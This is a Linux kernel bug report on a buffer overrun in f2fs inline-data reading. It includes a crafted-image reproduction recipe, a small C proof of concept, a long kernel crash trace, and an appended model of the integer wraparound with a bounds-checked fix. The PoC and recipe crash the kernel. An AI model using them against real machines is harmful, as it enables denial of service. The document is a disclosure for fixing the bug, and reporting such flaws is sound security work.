Bug 200219 - Buffer overrun when reading inline data in f2fs
Summary: Buffer overrun when reading inline data in f2fs
Status: NEW
Alias: None
Product: File System
Classification: Unclassified
Component: f2fs
Hardware: All Linux
Importance: P1 normal
Assignee: Default virtual assignee for f2fs
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2018-06-23 04:39 UTC by Wen Xu
Modified: 2019-07-24 02:54 UTC
CC List: 2 users

See Also:
Kernel Version: 4.18
Subsystem:
Regression: No
Bisected commit-id:


Attachments
The (compressed) crafted image which causes crash (70.37 KB, application/zip)
2018-06-23 04:39 UTC, Wen Xu

Description Wen Xu 2018-06-23 04:39:02 UTC
Created attachment 276757
The (compressed) crafted image which causes crash

- Overview
Buffer overrun when reading inline data in f2fs 

- Reproduce
# mkdir mnt
# mount -t f2fs 59.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Exercise the inline-data read path: readlink() on a symlink whose
 * target is stored inline in an inode of the crafted image. */
static void activity(const char *mpoint) {
  char *sln;
  char buf2[1024];
  ssize_t n;

  if (asprintf(&sln, "%s/foo/bar/sln", mpoint) < 0) {
    perror("asprintf");
    exit(1);
  }

  /* readlink() does not NUL-terminate buf2; on the affected kernel the
   * crash happens inside the syscall, before it returns. */
  n = readlink(sln, buf2, sizeof(buf2));
  if (n < 0)
    perror("readlink");
  free(sln);
}

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
    return 1;
  }
  activity(argv[1]);
  return 0;
}

- Kernel message
[  548.329372] F2FS-fs (loop0): Can't find valid F2FS filesystem in 2th superblock
[  554.515450] ==================================================================
[  554.516977] BUG: KASAN: out-of-bounds in f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.518397] Read of size 18446744073709513216 at addr ffff8801f42ab50c by task poc/1310
[  554.520066]
[  554.520710]
[  554.521037] The buggy address belongs to the page:
[  554.522002] page:ffffea0007d0aac0 count:1 mapcount:0 mapping:0000000000000000 index:0x0
[  554.523594] flags: 0x2ffff0000000000()
[  554.524362] raw: 02ffff0000000000 dead000000000100 dead000000000200 0000000000000000
[  554.525888] raw: 0000000000000000 0000000000000000 00000001ffffffff 0000000000000000
[  554.527415] page dumped because: kasan: bad access detected
[  554.528535]
[  554.528852] Memory state around the buggy address:
[  554.529820]  ffff8801f42ab400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.531252]  ffff8801f42ab480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.532700] >ffff8801f42ab500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.534126]                       ^
[  554.534832]  ffff8801f42ab580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.536276]  ffff8801f42ab600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[  554.537698] ==================================================================
[  554.539430] BUG: unable to handle kernel paging request at ffff8801eebe9000
[  554.540854] PGD 911ba067 P4D 911ba067 PUD 911c1067 PMD 1f3fb4063 PTE 80000001eebe9061
[  554.542431] Oops: 0003 [#1] SMP KASAN PTI
[  554.543253] CPU: 0 PID: 1310 Comm: poc Tainted: G    B             4.18.0-rc1+ #4
[  554.544746] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.546623] RIP: 0010:__memcpy+0x12/0x20
[  554.547409] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.571413] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.572474] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.573878] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.575283] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.576696] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.578099] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.579515] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.581152] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.582316] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.583750] Call Trace:
[  554.584264]  ? memcpy+0x45/0x50
[  554.584910]  f2fs_do_read_inline_data+0x1d9/0x2b0
[  554.585853]  f2fs_read_inline_data+0x99/0x300
[  554.586745]  f2fs_read_data_page+0xed/0x110
[  554.587609]  do_read_cache_page+0x476/0x780
[  554.588463]  ? f2fs_read_data_pages+0x100/0x100
[  554.589381]  ? trailing_symlink+0x3b0/0x3b0
[  554.590232]  ? pagecache_get_page+0x2f0/0x2f0
[  554.591113]  ? putname+0x80/0x90
[  554.591787]  ? __kasan_slab_free+0x151/0x1a0
[  554.592654]  ? putname+0x80/0x90
[  554.593320]  ? kasan_slab_free+0xe/0x10
[  554.594105]  ? kmem_cache_free+0x89/0x1e0
[  554.594923]  ? putname+0x80/0x90
[  554.595596]  ? filename_lookup+0x191/0x280
[  554.596431]  ? f2fs_read_data_pages+0x100/0x100
[  554.597340]  read_cache_page+0x40/0x50
[  554.598100]  page_get_link+0x5d/0x1b0
[  554.598843]  f2fs_get_link+0x14/0x70
[  554.599578]  vfs_readlink+0x171/0x240
[  554.600322]  ? readlink_copy+0x50/0x50
[  554.601096]  do_readlinkat+0x1e3/0x210
[  554.601861]  ? __x32_compat_sys_newfstat+0x40/0x40
[  554.602833]  ? setxattr+0x260/0x260
[  554.603596]  ? removexattr+0xf0/0xf0
[  554.604329]  __x64_sys_readlink+0x48/0x60
[  554.605146]  do_syscall_64+0x78/0x170
[  554.605897]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  554.606913] RIP: 0033:0x7f4fe4946a37
[  554.607641] Code: 73 01 c3 48 8b 0d 61 b4 2c 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 b8 59 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 31 b4 2c 00 f7 d8 64 89 01 48
[  554.611357] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.612863] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.614268] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.615700] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.617110] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.618514] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.619938] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.629596] CR2: ffff8801eebe9000
[  554.630278] ---[ end trace 4ce02f25ff7d3df5 ]---
[  554.631214] RIP: 0010:__memcpy+0x12/0x20
[  554.632026] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.635762] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.636808] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.638210] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.639626] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.641056] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.642464] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.643885] FS:  00007f4fe4e33700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.645474] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.646611] CR2: ffff8801eebe9000 CR3: 00000001f0a5c000 CR4: 00000000000006f0
[  554.648461] BUG: unable to handle kernel paging request at 000004b2ffffffff
[  554.649875] PGD 0 P4D 0
[  554.650404] Oops: 0000 [#2] SMP KASAN PTI
[  554.651226] CPU: 0 PID: 1310 Comm: poc Tainted: G    B D           4.18.0-rc1+ #4
[  554.652768] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  554.654663] RIP: 0010:map_id_up+0x85/0x1f0
[  554.655489] Code: ff ff c7 00 f1 f1 f1 f1 c7 40 04 00 04 f4 f4 c7 40 08 f3 f3 f3 f3 65 48 8b 04 25 28 00 00 00 48 89 45 d0 31 c0 e8 1b 7a 1a 00 <8b> 03 89 85 74 ff ff ff 83 f8 05 0f 87 07 01 00 00 85 c0 0f 84 f8
[  554.667336] RSP: 0018:ffff8801e0ef7bd0 EFLAGS: 00010096
[  554.668390] RAX: 0000000000000000 RBX: 000004b2ffffffff RCX: ffffffffb81f5cb5
[  554.669789] RDX: 0000000000000000 RSI: 0000000000000004 RDI: 000004b2ffffffff
[  554.671191] RBP: ffff8801e0ef7c70 R08: ffffed003c1defb0 R09: ffff8801e0ef7d00
[  554.672602] R10: 0000000000000010 R11: ffffed003c1defaf R12: 0000000000000000
[  554.674016] R13: 0000000000000011 R14: ffff8801f2676040 R15: 1ffff1003c1def7d
[  554.675416] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.677012] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.678151] CR2: 000004b2ffffffff CR3: 000000009000e000 CR4: 00000000000006f0
[  554.679562] Call Trace:
[  554.680074]  ? make_kprojid+0x20/0x20
[  554.680819]  from_kuid_munged+0x28/0x50
[  554.681604]  do_notify_parent+0x1f5/0x4f0
[  554.682417]  ? send_sigqueue+0x390/0x390
[  554.683212]  ? css_set_move_task+0x152/0x340
[  554.684096]  ? will_become_orphaned_pgrp+0x11c/0x160
[  554.685092]  do_exit+0x1290/0x1390
[  554.685786]  ? mm_update_next_owner+0x380/0x380
[  554.686696]  ? setxattr+0x260/0x260
[  554.687406]  ? removexattr+0xf0/0xf0
[  554.688153]  ? __x64_sys_readlink+0x48/0x60
[  554.689007]  rewind_stack_do_exit+0x17/0x20
[  554.689849] RIP: 0033:0x7f4fe4946a37
[  554.690568] Code: Bad RIP value.
[  554.691241] RSP: 002b:00007ffc93ff26c8 EFLAGS: 00000202 ORIG_RAX: 0000000000000059
[  554.692755] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f4fe4946a37
[  554.694190] RDX: 0000000000000071 RSI: 00007ffc93ff27b0 RDI: 00000000009bd100
[  554.695621] RBP: 00007ffc93ff2830 R08: 0000000000000002 R09: 0000000000000001
[  554.697040] R10: 000000000000058b R11: 0000000000000202 R12: 0000000000400c20
[  554.698445] R13: 00007ffc93ff2930 R14: 0000000000000000 R15: 0000000000000000
[  554.699872] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  554.709208] CR2: 000004b2ffffffff
[  554.709876] ---[ end trace 4ce02f25ff7d3df6 ]---
[  554.710809] RIP: 0010:__memcpy+0x12/0x20
[  554.711610] Code: 5b 41 5c 41 5d 5d c3 48 89 df e8 59 f6 ff ff eb c9 90 90 90 90 90 90 90 66 66 90 66 90 48 89 f8 48 89 d1 48 c1 e9 03 83 e2 07 <f3> 48 a5 89 d1 f3 a4 c3 66 0f 1f 44 00 00 48 89 f8 48 89 d1 f3 a4
[  554.715325] RSP: 0018:ffff8801e0ef7a38 EFLAGS: 00010246
[  554.716369] RAX: ffff8801eebc7000 RBX: ffffffffffff6a00 RCX: 1fffffffffffa940
[  554.717775] RDX: 0000000000000000 RSI: ffff8801f42cd50c RDI: ffff8801eebe9000
[  554.719182] RBP: ffff8801e0ef7a58 R08: ffffed003dd79001 R09: ffffed003dd77b40
[  554.720597] R10: ffffffffffffed40 R11: ffffed003dd77b3f R12: ffff8801eebc7000
[  554.722005] R13: ffff8801f42ab50c R14: ffffea0007baf1c8 R15: ffff8801f2001b80
[  554.723407] FS:  0000000000000000(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  554.725017] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  554.726151] CR2: 00007f4fe4946a0d CR3: 000000009000e000 CR4: 00000000000006f0
[  554.727572] Fixing recursive fault but reboot is needed!

- Location
https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/f2fs/inline.c#L60
	memcpy(dst_addr, src_addr, MAX_INLINE_DATA(inode));
Based on the KASAN report, there is a buffer overrun in this memcpy().

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab, Gatech.
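The size the KASAN report prints (18446744073709513216, i.e. 2^64 - 38400) is what MAX_INLINE_DATA(inode) yields once the inode's i_extra_isize and i_inline_xattr_size claim more address slots than the inode holds: the slot count is computed in int, goes negative, and is then converted to size_t for the multiply by sizeof(__le32). The C model below is added here and is not part of the bug report; it reproduces that arithmetic against constructed field values and shows the range check a filesystem should apply to those on-disk fields before trusting the derived length. The constants follow v4.18-rc1's fs/f2fs/f2fs.h as I read it, and the field values are chosen to reproduce the reported size, not read from the attached image.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constants as in fs/f2fs/f2fs.h of v4.18-rc1. The two DEFAULT_* values
 * are what mkfs.f2fs normally writes and serve only as the sane reference. */
#define DEF_ADDRS_PER_INODE      923
#define DEF_INLINE_RESERVED_SIZE 1
#define DEFAULT_EXTRA_ISIZE      36   /* bytes of extra inode attributes */
#define DEFAULT_INLINE_XATTR     50   /* address slots for inline xattrs */

/* The two on-disk inode fields (both __le16 on disk) that an image controls. */
struct inode_fields {
    uint16_t i_extra_isize;       /* bytes of extra attributes */
    uint16_t i_inline_xattr_size; /* address slots used by inline xattrs */
};

/* Mirrors MAX_INLINE_DATA(inode): the subtraction is done in int, then
 * multiplied by sizeof(__le32), a size_t, so a negative slot count wraps
 * to a huge unsigned length that memcpy() walks straight off the page. */
size_t max_inline_data_as_kernel(const struct inode_fields *f)
{
    int addrs = DEF_ADDRS_PER_INODE - (int)(f->i_extra_isize / sizeof(uint32_t))
              - (int)f->i_inline_xattr_size - DEF_INLINE_RESERVED_SIZE;
    return sizeof(uint32_t) * addrs;   /* int -> size_t conversion wraps */
}

/* Defender's version (illustrative, not upstream code): derive the slot
 * count in signed arithmetic and refuse the inode unless it fits inside the
 * inode block. Returns the byte length, or 0 for an inode to reject. */
size_t max_inline_data_checked(const struct inode_fields *f)
{
    long addrs = (long)DEF_ADDRS_PER_INODE - (long)(f->i_extra_isize / 4)
               - (long)f->i_inline_xattr_size - DEF_INLINE_RESERVED_SIZE;
    if (f->i_extra_isize % 4 != 0 || addrs <= 0 || addrs > DEF_ADDRS_PER_INODE)
        return 0;
    return (size_t)addrs * sizeof(uint32_t);
}

int main(void)
{
    struct inode_fields sane = { DEFAULT_EXTRA_ISIZE, DEFAULT_INLINE_XATTR };
    /* Constructed: 9 + 10513 = 10522 slots claimed, 9600 more than exist. */
    struct inode_fields bad  = { DEFAULT_EXTRA_ISIZE, 10513 };
    printf("sane: kernel=%zu checked=%zu\n",
           max_inline_data_as_kernel(&sane), max_inline_data_checked(&sane));
    printf("bad : kernel=%zu checked=%zu\n",
           max_inline_data_as_kernel(&bad), max_inline_data_checked(&bad));
    return 0;
}
```

The sane inode yields 3452 bytes in both versions; the crafted one yields the report's 18446744073709513216 from the kernel-style arithmetic and is rejected by the checked version.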
Comment 1 Chao Yu 2019-07-24 02:54:13 UTC
Should have been fixed by the commit below:

042be0f849e5 ("f2fs: fix to do sanity check with current segment number")

To Wen Xu, let me know if you have further questions about this.
